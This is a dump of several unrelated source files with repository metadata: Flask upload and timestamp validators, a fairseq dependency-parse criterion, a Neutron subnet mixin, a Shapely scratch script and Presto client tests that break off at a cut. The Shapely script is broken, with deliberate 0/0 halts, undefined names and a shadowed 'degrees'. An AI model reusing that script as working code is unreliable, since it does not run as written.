The posted utf-8 data as a string.
posted_file.mimetype: str
MIME type of the file in the request body.
Raises
------
BadAPIRequest
- There is more than one file in the request.
- If the request does not contain a file.
- The file does not contain valid utf-8.
"""
posted_files = list(request.files.keys())
if len(posted_files) > 1:
error = "Multiple files found. Please upload one file at a time."
raise BadAPIRequest(error=error)
try:
posted_filename = posted_files[0]
posted_file = request.files[posted_filename]
except IndexError:
error = "Missing file in request body."
raise BadAPIRequest(error=error)
posted_data = posted_file.read()
try:
decoded_data = posted_data.decode('utf-8')
except UnicodeDecodeError:
error = 'File could not be decoded as UTF-8.'
raise BadAPIRequest(error=error)
return decoded_data, posted_file.mimetype
def validate_parsable_values():
"""Can be called from a POST view/endpoint to examine posted
data for mimetype and attempt to parse to a DataFrame.
Raises
------
BadAPIRequest
If the data cannot be parsed.
werkzeug.exceptions.RequestEntityTooLarge
If the `Content-Length` header is greater than the application's
`MAX_CONTENT_LENGTH` config variable.
"""
# Default for content length in case of empty body
content_length = int(request.headers.get('Content-Length', 0))
if (content_length > current_app.config['MAX_CONTENT_LENGTH']):
raise RequestEntityTooLarge
if request.mimetype == 'multipart/form-data':
decoded_data, mimetype = decode_file_in_request_body()
else:
decoded_data = request.get_data(as_text=True)
mimetype = request.mimetype
value_df = parse_values(decoded_data, mimetype)
if value_df.size == 0:
raise BadAPIRequest({
'error': ("Posted data contained no values."),
})
return value_df
def parse_to_timestamp(dt_string):
"""Attempts to parse to Timestamp.
Parameters
----------
dt_string: str
Returns
-------
pandas.Timestamp
Raises
------
ValueError
If the string cannot be parsed to timestamp, or parses to null
"""
timestamp = pd.Timestamp(dt_string)
if pd.isnull(timestamp):
raise ValueError
if timestamp.tzinfo is None:
# consinstent with schema ISODateTime
timestamp = timestamp.tz_localize('UTC')
return timestamp
def validate_start_end():
"""Parses start and end query parameters into pandas
Timestamps.
Returns
-------
start: Pandas Timestamp
end: Pandas TimeStamp
Raises
------
BadAPIRequest
If start and end values cannot be parsed.
"""
errors = {}
start = request.args.get('start', None)
end = request.args.get('end', None)
if start is not None:
try:
start = parse_to_timestamp(start)
except ValueError:
errors.update({'start': ['Invalid start date format']})
else:
errors.update({'start': ['Must provide a start time']})
if end is not None:
try:
end = parse_to_timestamp(end)
except ValueError:
errors.update({'end': ['Invalid end date format']})
else:
errors.update({'end': ['Must provide a end time']})
if errors:
raise BadAPIRequest(errors)
# parse_to_timestamp ensures there is a tz
if end.tzinfo != start.tzinfo:
end = end.tz_convert(start.tzinfo)
if end - start > current_app.config['MAX_DATA_RANGE_DAYS']:
raise BadAPIRequest({'end': [
f'Only {current_app.config["MAX_DATA_RANGE_DAYS"].days} days of '
'data may be requested per request']})
return start, end
def validate_index_period(index, interval_length, previous_time):
"""
Validate that the index conforms to interval_length.
Parameters
----------
index : pd.DatetimeIndex
interval_length : int
Regular period of data in minutes
previous_time : pd.Timestamp or None
The last time in the database before the start of index.
May be None.
Raises
------
BadApiRequest
If there are any errors
"""
if len(index) == 0:
raise BadAPIRequest({'timestamp': ['No times to validate']})
errors = []
start = index[0]
end = index[-1]
freq = pd.Timedelta(f'{interval_length}min')
expected_index = pd.date_range(start=start, end=end,
freq=freq)
missing_times = expected_index.difference(index)
if len(missing_times) > 0:
errors.append(f'Missing {len(missing_times)} timestamps. '
f'First missing timestamp is {missing_times[0]}. '
'Uploads must have equally spaced timestamps '
f'from {start} to {end} with {interval_length} '
'minutes between each timestamp.')
extra_times = index.difference(expected_index)
if len(extra_times) > 0:
errors.append(f'{len(extra_times)} extra times present in index. '
f'First extra time is {extra_times[0]}. '
'Uploads must have equally spaced timestamps '
f'from {start} to {end} with {interval_length} '
'minutes between each timestamp.')
if previous_time is not None:
if (start - previous_time).total_seconds() % freq.total_seconds() != 0:
errors.append(
f'Start of timeseries is not a multiple of {interval_length} '
'minutes past the previous time of '
f'{previous_time.isoformat()}.')
if errors:
raise BadAPIRequest({'timestamp': errors})
def validate_forecast_values(forecast_df):
"""Validates that posted values are parseable and of the expectedtypes.
Parameters
----------
forecast_df: Pandas DataFrame
Raises
------
BadAPIRequestError
If an expected field is missing or contains an entry of incorrect
type.
"""
errors = {}
try:
forecast_df['value'] = pd.to_numeric(forecast_df['value'],
downcast='float')
except ValueError:
error = ('Invalid item in "value" field. Ensure that all values '
'are integers, floats, empty, NaN, or NULL.')
errors.update({'value': [error]})
except KeyError:
errors.update({'value': ['Missing "value" field.']})
try:
forecast_df['timestamp'] = pd.to_datetime(
forecast_df['timestamp'],
utc=True)
except ValueError:
error = ('Invalid item in "timestamp" field. Ensure that '
'timestamps are ISO8601 compliant')
errors.update({'timestamp': [error]})
except KeyError:
errors.update({'timestamp': ['Missing "timestamp" field.']})
if errors:
raise BadAPIRequest(errors)
def _restrict_in_extra(extra_params):
match = re.search('"restrict_upload(["\\s\\:]*)true',
extra_params, re.I)
return match is not None
def _current_utc_timestamp():
# for easier testing
return pd.Timestamp.now(tz='UTC')
def restrict_forecast_upload_window(extra_parameters, get_forecast,
first_time):
"""
Check that the first_time falls within the window before the
next initialization time of the forecast from the current time.
Accounts for forecast lead_time_to_start and interval_label.
Requires 'read' permission on the forecast in question.
Parameters
----------
extra_parameters : str
The extra_parameters string for the forecast. If
'"restrict_upload": true' is not found in the string, no restriction
occurs and this function returns immediately.
get_forecast : func
Function to get the forecast from the database.
first_time : datetime-like
First timestamp in the posted forecast timeseries.
Raises
------
NotFoundException
When the user does not have 'read' permission for the forecast or
it doesn't exist.
BadAPIRequest
If the first_time of the timeseries is not consistent for the
next initaliziation time of the forecast.
"""
if not _restrict_in_extra(extra_parameters):
return
try:
fx_dict = get_forecast().copy()
except (StorageAuthError, NotFoundException):
raise NotFoundException(errors={
'404': 'Cannot read forecast or forecast does not exist'})
# we don't care about the axis or constant values for probabilistic
fx_dict['site'] = Site('name', 0, 0, 0, 'UTC')
fx = Forecast.from_dict(fx_dict)
next_issue_time = fx_utils.get_next_issue_time(
fx, _current_utc_timestamp())
expected_start = next_issue_time + fx.lead_time_to_start
if fx.interval_label == 'ending':
expected_start += fx.interval_length
if first_time != expected_start:
raise BadAPIRequest(errors={'issue_time': (
f'Currently only accepting forecasts issued for {next_issue_time}.'
f' Expecting forecast series to start at {expected_start}.'
)})
def validate_latitude_longitude():
"""Validates latitude and longitude parameters
Returns
-------
latitude: float
longitude: float
Raises
------
BadAPIRequest
If latitude and longitude values are not provided
or not in range.
"""
errors = {}
lat = request.args.get('latitude', None)
lon = request.args.get('longitude', None)
if lat is not None:
try:
lat = float(lat)
except ValueError:
errors.update({'latitude': ['Must be a float']})
else:
if lat > 90 or lat < -90:
errors.update({
'latitude': ['Must be within [-90, 90].']})
else:
errors.update({'latitude': ['Must provide a latitude']})
if lon is not None:
try:
lon = float(lon)
except ValueError:
errors.update({'longitude': ['Must be a float']})
else:
if lon > 180 or lon < -180:
errors.update({'longitude':
['Must be within (-180, 180].']})
else:
errors.update({'longitude': ['Must provide a longitude']})
if errors:
raise BadAPIRequest(errors)
return lat, lon
def validate_event_data(data):
"""
Validate that the data is either 0 or 1
Parameters
----------
data : pd.Dataframe with 'value' column
Raises
------
BadApiRequest
If there are any errors
"""
isbool = (data['value'] == 0) | (data['value'] == 1)
if not isbool.all():
indx = isbool.reset_index()[~isbool.values].index.astype('str')
raise BadAPIRequest({'value': [
'Invalid event values at locations %s' % ', '.join(indx)]})
| 31.332717
| 79
| 0.613238
|
587d371a4ef1b63fa00833efae81fb1010f6b3ab
| 5,828
|
py
|
Python
|
pororo/models/brainbert/criterions/dependency_parse.py
|
jayten42/pororo
|
0b02e6a633b9a32ec4241b8ed96745e6592db317
|
[
"Apache-2.0"
] | 1,137
|
2021-02-02T02:09:06.000Z
|
2022-03-29T03:10:40.000Z
|
pororo/models/brainbert/criterions/dependency_parse.py
|
jayten42/pororo
|
0b02e6a633b9a32ec4241b8ed96745e6592db317
|
[
"Apache-2.0"
] | 57
|
2021-02-02T03:29:54.000Z
|
2022-03-31T16:20:00.000Z
|
pororo/models/brainbert/criterions/dependency_parse.py
|
jayten42/pororo
|
0b02e6a633b9a32ec4241b8ed96745e6592db317
|
[
"Apache-2.0"
] | 216
|
2021-02-02T02:49:02.000Z
|
2022-03-28T01:19:58.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates and Kakao Brain. All Rights Reserved
import math
import torch
import torch.nn.functional as F
from fairseq import utils
from fairseq.criterions import FairseqCriterion, register_criterion
@register_criterion("dependency_parse")
class DependencyParseLabelCriterion(FairseqCriterion):
def __init__(self, args, task):
super().__init__(args, task)
self.classification_head_name = args.classification_head_name
@staticmethod
def add_args(parser):
# fmt: off
parser.add_argument(
"--classification-head-name",
default="dependency_parse_head",
help="name of the classification head to use",
)
# fmt: on
def forward(self, model, sample, reduce=True):
"""Compute the loss for the given sample.
Returns a tuple with three elements:
1) the loss
2 the sample size, which is used as the denominator for the gradient
3) logging outputs to display while training
"""
assert (
hasattr(model, "classification_heads") and
self.classification_head_name in model.classification_heads
), "model must provide sentence classification head for --criterion=dependency_parse_head"
# extract features from backbone module
features, _ = model(
**sample["net_input"],
**sample["segments"],
features_only=True,
)
masks = sample["net_input"]["src_tokens"] == 1
# forward extracted features to get label and head logits
# yapf: disable
head_logits, label_logits = model.classification_heads[self.classification_head_name](
features,
masks,
)
# yapf: enable
# calculate head loss
head_targets = sample["target0"].view(-1)
head_logits = head_logits.view(-1, head_logits.size(-1))
head_logits = head_logits[head_targets != 0]
head_targets = head_targets[head_targets != 0]
head_loss = F.nll_loss(
F.log_softmax(head_logits, dim=-1, dtype=torch.float32),
head_targets,
ignore_index=-1,
)
masked_preds = head_logits[head_targets != -1].argmax(dim=1)
masked_targets = head_targets[head_targets != -1]
head_ncorrect = utils.item((masked_preds == masked_targets).sum())
sample_size = masked_targets.size(0)
# calculate label loss
label_targets = sample["target1"].view(-1)
label_logits = label_logits.view(-1, label_logits.size(-1))
label_logits = label_logits[label_targets != 0]
label_targets = label_targets[label_targets != 0]
label_loss = F.nll_loss(
F.log_softmax(label_logits, dim=-1, dtype=torch.float32),
label_targets,
ignore_index=-1,
)
masked_preds = label_logits[label_targets != -1].argmax(dim=1)
masked_targets = label_targets[label_targets != -1]
label_ncorrect = utils.item((masked_preds == masked_targets).sum())
loss = label_loss + head_loss
logging_output = {
"sample_size": sample_size,
"ntokens": sample["ntokens"],
"nsentences": sample["target0"].size(0),
"loss": utils.item(loss.data),
"head_loss": utils.item(head_loss.data),
"label_loss": utils.item(label_loss.data),
"head_ncorrect": head_ncorrect,
"label_ncorrect": label_ncorrect,
}
return loss, sample_size, logging_output
@staticmethod
def aggregate_logging_outputs(logging_outputs):
"""Aggregate logging outputs from data parallel training."""
loss_sum = utils.item(sum(
log.get("loss", 0) for log in logging_outputs))
label_loss_sum = utils.item(
sum(log.get("label_loss", 0) for log in logging_outputs))
head_loss_sum = utils.item(
sum(log.get("head_loss", 0) for log in logging_outputs))
ntokens = utils.item(
sum(log.get("ntokens", 0) for log in logging_outputs))
nsentences = utils.item(
sum(log.get("nsentences", 0) for log in logging_outputs))
sample_size = utils.item(
sum(log.get("sample_size", 0) for log in logging_outputs))
nll_loss = loss_sum / ntokens / math.log(2)
label_loss = label_loss_sum / sample_size / math.log(2)
head_loss = head_loss_sum / sample_size / math.log(2)
agg_output = {
"loss": loss_sum / sample_size / math.log(2),
"label_loss": label_loss,
"head_loss": head_loss,
"ntokens": ntokens,
"nsentences": nsentences,
"sample_size": sample_size,
"nll_loss": nll_loss,
}
if len(logging_outputs) > 0 and "head_ncorrect" in logging_outputs[0]:
head_ncorrect = sum(
log.get("head_ncorrect", 0) for log in logging_outputs)
head_accuracy = (head_ncorrect / sample_size) * 100
agg_output.update(head_accuracy=head_accuracy)
if len(logging_outputs) > 0 and "label_ncorrect" in logging_outputs[0]:
label_ncorrect = sum(
log.get("label_ncorrect", 0) for log in logging_outputs)
label_accuracy = (label_ncorrect / sample_size) * 100
agg_output.update(label_accuracy=label_accuracy)
return agg_output
@staticmethod
def logging_outputs_can_be_summed() -> bool:
"""
Whether the logging outputs returned by `forward` can be summed
across workers prior to calling `reduce_metrics`. Setting this
to True will improves distributed training speed.
"""
return True
| 36.198758
| 98
| 0.622169
|
60f2be95a6973df01fb504c83bffb400ffb91254
| 1,324
|
py
|
Python
|
neutron/db/subnet_service_type_db_models.py
|
MultipleCrashes/neutron
|
fb268d7e91b22192a6e42f78b0057b4ebd3033ef
|
[
"Apache-2.0"
] | 1
|
2019-06-02T06:15:39.000Z
|
2019-06-02T06:15:39.000Z
|
neutron/db/subnet_service_type_db_models.py
|
MultipleCrashes/neutron
|
fb268d7e91b22192a6e42f78b0057b4ebd3033ef
|
[
"Apache-2.0"
] | null | null | null |
neutron/db/subnet_service_type_db_models.py
|
MultipleCrashes/neutron
|
fb268d7e91b22192a6e42f78b0057b4ebd3033ef
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Hewlett Packard Enterprise Development Company, LP
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# TODO(ihrachys): consider renaming the module since now it does not contain
# any models at all
from neutron.api.v2 import attributes
from neutron.db import _resource_extend as resource_extend
class SubnetServiceTypeMixin(object):
"""Mixin class to extend subnet with service type attribute"""
def _extend_subnet_service_types(self, subnet_res, subnet_db):
subnet_res['service_types'] = [service_type['service_type'] for
service_type in
subnet_db.service_types]
resource_extend.register_funcs(
attributes.SUBNETS, [_extend_subnet_service_types])
| 40.121212
| 78
| 0.712991
|
11638d56f883607eac81074f3f11f6bf4d2aea1f
| 5,715
|
py
|
Python
|
.ipynb_checkpoints/test-checkpoint.py
|
ymoisan/GeoSim
|
84f1482c885d7d3b1e07b92dee9580e4bcacf9cb
|
[
"MIT"
] | null | null | null |
.ipynb_checkpoints/test-checkpoint.py
|
ymoisan/GeoSim
|
84f1482c885d7d3b1e07b92dee9580e4bcacf9cb
|
[
"MIT"
] | null | null | null |
.ipynb_checkpoints/test-checkpoint.py
|
ymoisan/GeoSim
|
84f1482c885d7d3b1e07b92dee9580e4bcacf9cb
|
[
"MIT"
] | null | null | null |
from shapely.geometry import LineString, Point, Polygon, MultiLineString
from shapely.strtree import STRtree
#import random, time
#from rtree import index
from cmath import rect, phase
from math import radians, degrees
from shapely.ops import polygonize, polygonize_full, split
line = LineString(((0,0),(5,0),(10,0)))
a = line.project(Point(5,10))
ext = [(0,0), (0,10),(3,10),(3,14),(7,14),(7,10),(10,10), (10,0),(0,0)]
int_1 = [[(4,11), (4,12),(6,12),(6,11), (4,11)]]
int_2 = [[(4,9.5), (4,10.5),(6,10.5),(6,9.5), (4,9.5)]]
pol = Polygon(ext, int_1)
val = pol.is_valid
pol_s = pol.simplify(5, preserve_topology=True)
val = pol.is_simple
pol = Polygon(ext, int)
val = pol.is_valid
pol_s = pol.simplify(5, preserve_topology=True)
pol_s1 = pol.simplify(5, preserve_topology=False)
val2 = pol_s1.is_valid
pol = Polygon([(((0,0), 0,10),(10,10), (10,12), (12,12), (12,10), (20,10)), ((11,0), (11,4),(12,4),(12,5),(11,5), (11,7), (11,11))])
mline1 = mline.simplify(2, preserve_topology=True)
mline = MultiLineString([((0,10),(10,10), (10,12), (12,12), (12,10), (20,10)), ((11,0), (11,4),(12,4),(12,5),(11,5), (11,7), (11,11))])
mline1 = mline.simplify(2, preserve_topology=True)
line = LineString([(0,0),(10,0), (11,0), (11,1), (10,1), (20,0), (20,1), (22,1), (22,0), (30, 0), (30,-5), (21,-5), (21,.5)])
line1 = line.simplify(1, preserve_topology=True)
line = LineString([(0,0),(2,2), (4,-2), (6,2), (7,0), (8,0)])
splitter = LineString([(0,0),(8,0)])
line_a = LineString([(0,0),(10,0)])
line_b = LineString([(10,110),(20,20)])
line_c = LineString([(7,0),(9,0)])
line_split = split(line, splitter)
splitter_split = split(splitter, line)
pol = polygonize_full([line_split, splitter_split])
val_a = line_a.intersects(pol[0])
val_b = line_b.intersects(pol[0])
val_c = line_c.intersects(pol[0])
coords = [(0, 0), (0, 2), (1, 1), (2, 2), (2, 0), (1, 1), (0, 0)]
coords = [(0,0),(5,0), (10,0), (10,10), (5,10), (5,0), (5,-10),(0,-10), (0,0)]
bowtie = Polygon(coords)
va11 = bowtie.is_valid
clean = bowtie.buffer(0)
val2 = clean.is_valid
l_a = [(0,0),(1,3),(2,-3),(10,10), (0,0)]
pol = Polygon (l_a)
pol1 = pol.buffer(0)
l_b = [(0,0),(10,10)]
line_a = LineString(l_a)
line_b = LineString(l_b)
p = polygonize_full([line_a,line_b])
p0 = [(0,0),(10,0),(10,10),(0,10),(0,0)]
p1 = [(0,10),(10,10),(10,20),(0,20),(0,10)]
p2 = [(0,0),(20,20),(-5,20),(-5,17),(5,17),(5,12),(-5,12),(0,0)]
pol1 = Polygon(p1)
pol2 = Polygon(p2)
pols = pol1.symmetric_difference(pol2)
p1 = [(0,0),(10,0),(10,10),(0,10),(0,0)]
p2 = [(2,2),(8,2),(8,8),(2,8),(2,2)]
pol1 = Polygon(p1)
pol2 = Polygon(p2)
pols1 = pol1.symmetric_difference(pol2)
pols2 = pol2.symmetric_difference(pol1)
p1 = [(0,0),(7,0),(7,7),(0,7),(0,0)]
p2 = p1 = [(0,10),(10,10),(10,20),(0,20),(0,10)]
pol1 = Polygon(p1)
pol2 = Polygon(p2)
pols1 = pol1.symmetric_difference(pol2)
pols2 = pol2.symmetric_difference(pol1)
0/0
0/0
def mean_angle(deg):
a = None
# a = sum(rect(1, radians(d)) for d,l in deg)
for d,ll in deg:
if a is None:
a = rect(ll, radians(d))
else:
a += rect(ll, radians(d))
b = phase(a)
c = degrees(b)
d = degrees(phase(sum(rect(l, radians(d)) for d,l in deg)/len(deg)))
return (c,d)
def mean_angle2(degrees):
angle_sum = 0.
tot_len = 0
a = sum(rect(l, radians(d)) for d,l in degrees)
a_phase = phase(a)
a_degree = degrees(a_phase)
for deg, len in degrees:
angle_sum += rect(1, radians(deg))
tot_len += len
average_sum = degrees(phase(angle_sum))
average_sum = average_sum / tot_len
d = degrees(angle_sum)
return d
return degrees(phase(sum(rect(1, radians(d)*l) for d,l in deg)/sum([c[1] for c in deg])))
for angles in [[(350,1000), (10,1)], [(90,1), (180,1), (270,1), (360,1)], [(10,10), (20,1), (30,1)]]:
print('The mean angle of', angles, 'is:', round(mean_angle(angles)[0], 12), 'degrees')
#for angles in [[(350,2), (10,4)], [(90,2), (180,2), (270,2), (360,2)], [(10,1), (20,2), (30,3)]]:
# print('The mean angle of', angles, 'is:', round(mean_angle2(angles), 12), 'degrees')
0/0
for xy in [(1,.1),(1,1),(0.1,1),(-0.1,1),(-1,1),(-1,-1),(1,-1)]:
line0 = LineString([(0,0), xy])
line1 = LineString([xy, (0,0)])
for line in (line0,line1):
x0, y0 = line.coords[0][0], line.coords[0][1]
x1, y1 = line.coords[1][0], line.coords[1][1]
delta_y = (y1 - y0)
delta_x = (x1 - x0)
angle = math.atan(delta_y / delta_x)
angle = math.degrees(angle)
print (x0, y0, x1, y1, angle)
0/0
# Create the triangles
for i in range(250000):
x = random.random() * 10000.
y = random.random() * 10000.
coords = [(x,y),(x+5, y+5),(x,y+10),(x,y)]
lst_lines.append(LineString(coords))
# Create the bounding boxes
for i in range(10000):
x = random.random() * 10000.
y = random.random() * 10000.
coords = [(x,y),(x+15,y),(x+15,y+15),(x,y+15),(x,y)]
lst_intersects.append(LineString(coords))
# Create shapely STRtree
tree = STRtree(lst_lines)
# Create RTree
idx = index.Index()
for i, line in enumerate(lst_lines):
idx.insert(i, line.bounds)
print (time.time())
sec1 = time.time()
# finf the intersection with STRtree
str_tree_nbr = 0
for intersect in lst_intersects:
str_tree = tree.query(intersect)
str_tree_nbr += len(str_tree)
sec2 = time.time()
print("Seconds for STRtree =", sec2-sec1)
print ("Str tree number: ", str_tree_nbr)
# Find the intersections with RTree
rtree_nbr = 0
for intersect in lst_intersects:
rtree = idx.intersection(intersect.bounds)
rtree_nbr += len(list(rtree))
sec3 = time.time()
print("Seconds for RTree =", sec3-sec2)
print ("Rtree number: ", rtree_nbr)
| 26.830986
| 135
| 0.59825
|
303121c189311850a6b0aaba7bf2fa8a68b516a6
| 19,860
|
py
|
Python
|
tests/test_client.py
|
highker/presto-python-client
|
4f5be9c81950cbddd4579a9e55dfce6db54fb8b2
|
[
"Apache-2.0"
] | null | null | null |
tests/test_client.py
|
highker/presto-python-client
|
4f5be9c81950cbddd4579a9e55dfce6db54fb8b2
|
[
"Apache-2.0"
] | null | null | null |
tests/test_client.py
|
highker/presto-python-client
|
4f5be9c81950cbddd4579a9e55dfce6db54fb8b2
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import httpretty
import pytest
import requests
import socket
import time
from requests_kerberos.exceptions import KerberosExchangeError
from prestodb.client import PrestoRequest
from prestodb import constants
import prestodb.exceptions
"""
This is the response to the first HTTP request (a POST) from an actual
Presto session. It is deliberately not truncated to document such response
and allow to use it for other tests.
To get some HTTP response, set logging level to DEBUG with
``logging.basicConfig(level=logging.DEBUG)`` or
``prestodb.client.logger.setLevel(logging.DEBUG)``.
::
from prestodb import dbapi
>>> import logging
>>> import prestodb.client
>>> prestodb.client.logger.setLevel(logging.DEBUG)
>>> conn = dbapi.Connection('localhost', 8080, 'ggreg', 'test')
>>> cur = conn.cursor()
>>> res = cur.execute('select * from system.runtime.nodes')
"""
RESP_DATA_POST_0 = {
'nextUri': 'coordinator:8080/v1/statement/20161115_222658_00040_xtnym/1',
'id': '20161115_222658_00040_xtnym',
'taskDownloadUris': [],
'infoUri': 'http://coordinator:8080/query.html?20161115_222658_00040_xtnym',
'stats': {
'scheduled': False,
'runningSplits': 0,
'processedRows': 0,
'queuedSplits': 0,
'processedBytes': 0,
'state': 'QUEUED',
'completedSplits': 0,
'queued': True,
'cpuTimeMillis': 0,
'totalSplits': 0,
'nodes': 0,
'userTimeMillis': 0,
'wallTimeMillis': 0,
},
}
"""
This is the response to the second HTTP request (a GET) from an actual
Presto session. It is deliberately not truncated to document such response
and allow to use it for other tests. After doing the steps above, do:
::
>>> cur.fetchall()
"""
RESP_DATA_GET_0 = {
'id': '20161116_195728_00000_xtnym',
'nextUri': 'coordinator:8080/v1/statement/20161116_195728_00000_xtnym/2',
'data': [
['UUID-0', 'http://worker0:8080', '0.157', False, 'active'],
['UUID-1', 'http://worker1:8080', '0.157', False, 'active'],
['UUID-2', 'http://worker2:8080', '0.157', False, 'active'],
],
'columns': [{
'name': 'node_id',
'type': 'varchar',
'typeSignature': {
'typeArguments': [],
'arguments': [{
'kind': 'LONG_LITERAL',
'value': 2147483647}
],
'literalArguments': [],
'rawType': 'varchar',
}
}, {
'name': 'http_uri',
'type': 'varchar',
'typeSignature': {
'typeArguments': [],
'arguments': [{
'kind': 'LONG_LITERAL',
'value': 2147483647,
}],
'literalArguments': [],
'rawType': 'varchar',
}
}, {
'name': 'node_version',
'type': 'varchar',
'typeSignature': {
'typeArguments': [],
'arguments': [{
'kind': 'LONG_LITERAL',
'value': 2147483647,
}],
'literalArguments': [],
'rawType': 'varchar',
}
}, {
'name': 'coordinator',
'type': 'boolean',
'typeSignature': {
'typeArguments': [],
'arguments': [],
'literalArguments': [],
'rawType': 'boolean',
}
}, {
'name': 'state',
'type': 'varchar',
'typeSignature': {
'typeArguments': [],
'arguments': [{
'kind': 'LONG_LITERAL',
'value': 2147483647,
}],
'literalArguments': [],
'rawType': 'varchar',
}
}],
'taskDownloadUris': [],
'partialCancelUri': 'http://localhost:8080/v1/stage/20161116_195728_00000_xtnym.0', # NOQA
'stats': {
'nodes': 2,
'processedBytes': 880,
'scheduled': True,
'completedSplits': 2,
'userTimeMillis': 0,
'state': 'RUNNING',
'rootStage': {
'nodes': 1,
'done': False,
'processedBytes': 1044,
'subStages': [{
'nodes': 1,
'done': True,
'processedBytes': 880,
'subStages': [],
'completedSplits': 1,
'userTimeMillis': 0,
'state': 'FINISHED',
'cpuTimeMillis': 3,
'runningSplits': 0,
'totalSplits': 1,
'processedRows': 8,
'stageId': '1',
'queuedSplits': 0,
'wallTimeMillis': 27,
}],
'completedSplits': 1,
'userTimeMillis': 0,
'state': 'RUNNING',
'cpuTimeMillis': 1,
'runningSplits': 0,
'totalSplits': 1,
'processedRows': 8,
'stageId': '0',
'queuedSplits': 0,
'wallTimeMillis': 9,
},
'queued': False,
'cpuTimeMillis': 3,
'runningSplits': 0,
'totalSplits': 2,
'processedRows': 8,
'queuedSplits': 0,
'wallTimeMillis': 36,
},
'infoUri': 'http://coordinator:8080/query.html?20161116_195728_00000_xtnym', # NOQA
}
RESP_ERROR_GET_0 = {
'error': {
'errorCode': 1,
'errorLocation': {'columnNumber': 15, 'lineNumber': 1},
'errorName': 'SYNTAX_ERROR',
'errorType': 'USER_ERROR',
'failureInfo': {
'errorLocation': {'columnNumber': 15, 'lineNumber': 1},
'message': 'line 1:15: Schema must be specified '
'when session schema is not set',
'stack': [
'com.facebook.presto.metadata.MetadataUtil.lambda$createQualifiedObjectName$2(MetadataUtil.java:133)',
'java.util.Optional.orElseThrow(Optional.java:290)',
'com.facebook.presto.metadata.MetadataUtil.createQualifiedObjectName(MetadataUtil.java:132)',
'com.facebook.presto.sql.analyzer.StatementAnalyzer.visitTable(StatementAnalyzer.java:529)',
'com.facebook.presto.sql.analyzer.StatementAnalyzer.visitTable(StatementAnalyzer.java:166)',
'com.facebook.presto.sql.tree.Table.accept(Table.java:50)',
'com.facebook.presto.sql.tree.AstVisitor.process(AstVisitor.java:22)',
'com.facebook.presto.sql.analyzer.StatementAnalyzer.analyzeFrom(StatementAnalyzer.java:1413)',
'com.facebook.presto.sql.analyzer.StatementAnalyzer.visitQuerySpecification(StatementAnalyzer.java:670)',
'com.facebook.presto.sql.analyzer.StatementAnalyzer.visitQuerySpecification(StatementAnalyzer.java:166)',
'com.facebook.presto.sql.tree.QuerySpecification.accept(QuerySpecification.java:125)',
'com.facebook.presto.sql.tree.AstVisitor.process(AstVisitor.java:22)',
'com.facebook.presto.sql.analyzer.StatementAnalyzer.visitQuery(StatementAnalyzer.java:438)',
'com.facebook.presto.sql.analyzer.StatementAnalyzer.visitQuery(StatementAnalyzer.java:166)',
'com.facebook.presto.sql.tree.Query.accept(Query.java:92)',
'com.facebook.presto.sql.tree.AstVisitor.process(AstVisitor.java:22)',
'com.facebook.presto.sql.analyzer.Analyzer.analyze(Analyzer.java:67)',
'com.facebook.presto.sql.analyzer.Analyzer.analyze(Analyzer.java:59)',
'com.facebook.presto.execution.SqlQueryExecution.doAnalyzeQuery(SqlQueryExecution.java:285)',
'com.facebook.presto.execution.SqlQueryExecution.analyzeQuery(SqlQueryExecution.java:271)',
'com.facebook.presto.execution.SqlQueryExecution.start(SqlQueryExecution.java:229)',
'com.facebook.presto.execution.QueuedExecution.lambda$start$1(QueuedExecution.java:62)',
'java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)',
'java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)',
'java.lang.Thread.run(Thread.java:745)',
],
'suppressed': [],
'type': 'com.facebook.presto.sql.analyzer.SemanticException',
},
'message': 'line 1:15: Schema must be specified when session schema is not set',
},
'id': '20161116_205844_00002_xtnym',
'infoUri': 'http://test02.presto.data.facebook.com:7777/query.html?20161116_205844_00002_xtnym',
'stats': {'completedSplits': 0,
'cpuTimeMillis': 0,
'nodes': 0,
'processedBytes': 0,
'processedRows': 0,
'queued': False,
'queuedSplits': 0,
'runningSplits': 0,
'scheduled': False,
'state': 'FAILED',
'totalSplits': 0,
'userTimeMillis': 0,
'wallTimeMillis': 0,
},
'taskDownloadUris': [],
}
def get_json_post_0(self):
return RESP_DATA_POST_0
def get_json_get_0(self):
return RESP_DATA_GET_0
def get_json_get_error_0(self):
return RESP_ERROR_GET_0
def test_presto_initial_request(monkeypatch):
monkeypatch.setattr(PrestoRequest.http.Response, 'json', get_json_post_0)
req = PrestoRequest(
host='coordinator',
port=8080,
user='test',
source='test',
catalog='test',
schema='test',
http_scheme='http',
session_properties={},
)
http_resp = PrestoRequest.http.Response()
http_resp.status_code = 200
status = req.process(http_resp)
assert status.next_uri == RESP_DATA_POST_0['nextUri']
assert status.id == RESP_DATA_POST_0['id']
class ArgumentsRecorder(object):
def __init__(self):
# Prevent functools.wraps from complaining when it decorates the
# instance.
self.__name__ = 'ArgumentsRecorder'
self.args = None
self.kwargs = None
def __call__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
def test_request_headers(monkeypatch):
post_recorder = ArgumentsRecorder()
monkeypatch.setattr(PrestoRequest.http.Session, 'post', post_recorder)
get_recorder = ArgumentsRecorder()
monkeypatch.setattr(PrestoRequest.http.Session, 'get', get_recorder)
catalog = 'test_catalog'
schema = 'test_schema'
user = 'test_user'
source = 'test_source'
accept_encoding_header = 'accept-encoding'
accept_encoding_value = 'identity,deflate,gzip'
client_info_header = constants.HEADER_PREFIX + 'Client-Info'
client_info_value = 'some_client_info'
req = PrestoRequest(
host='coordinator',
